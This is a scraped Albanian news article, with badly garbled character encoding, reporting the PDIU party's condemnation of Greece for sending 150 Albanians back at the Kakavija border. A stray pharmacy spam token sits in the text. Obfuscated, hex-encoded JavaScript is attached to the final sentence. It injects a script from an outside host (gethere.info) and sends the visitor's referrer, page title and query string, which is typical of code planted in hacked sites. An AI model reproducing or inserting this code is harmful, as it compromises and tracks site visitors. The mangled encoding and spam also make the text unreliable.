largea_shpetim-idrizi1352882163

Kthimi i shqiptarA�ve nA� kufi, PDIU: MPJ t`i kA�rkojA� sqarime GreqisA�

acquistare_viagra_25_mg. Partia DrejtA�si, Integrim dhe Unitet dA�non me ashpA�rsi kthimin nA� pikA�n kufitare tA� KakavijA�s tA� 150 shqiptarA�ve, pa asnjA� arsye tA� pranueshme.

NA� njA� deklaratA� pA�r shtyp, PDIU-ja ka deklaruar se Ministria e Jashtme tA� ShqipA�risA� duhet t`i kA�rkojA� sqarime palA�s greke pA�r kA�to incidente tA� rA�nda dhe tA� bA�j tA� qartA� se ShqipA�ria nuk do tA� pranojA� mA� nA� asnjA� rrethanA� nA�pA�rkA�mbjen e qytetarA�ve tA� saj.

a�?NA�se nuk do tA� ekzistoj njA� zgjidhje institucionale, PDIU do ta��i bashkangjitet nismA�s sA� Klubit tA� PatriotA�ve tA� Rinj pA�r tA� bojkotuar A�do produkt grek nA� tregun shqiptar, nismA� qA� jemi tA� sigurt se do tA� gjejA� mbA�shtetje masive tA� bashkA�kombasit tanA�a�? thuhet nA� deklaratA�n e PDIU-sA�

Gjithashtu PDIU-ja thekson se kthimi nA� kufi i qytetarA�ve shqiptarA� A�shtA� njA� hakmarrje primitive nga pala greke, e cila nuk ka vend nA� EvropA�n e shekullit XXI.

a�?Ky incident tregon nA� thelb hipokrizinA� e shtetarA�ve grekA�, tA� cilA�t vetA�m pak kohA� mA� parA� kishin premtuar se nuk do tA� kishte mA� kthim nA� kufi. Kjo lloj politike bizantine nuk dA�mton shqiptarA�t, por vetA� GreqinA�, teksa tregon nA� sytA� e tA� gjithA� botA�s sA� qytetA�ruar sjelljen A�njerrA�zore tA� autoriteteve grekea�? pA�rfundon deklarata.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}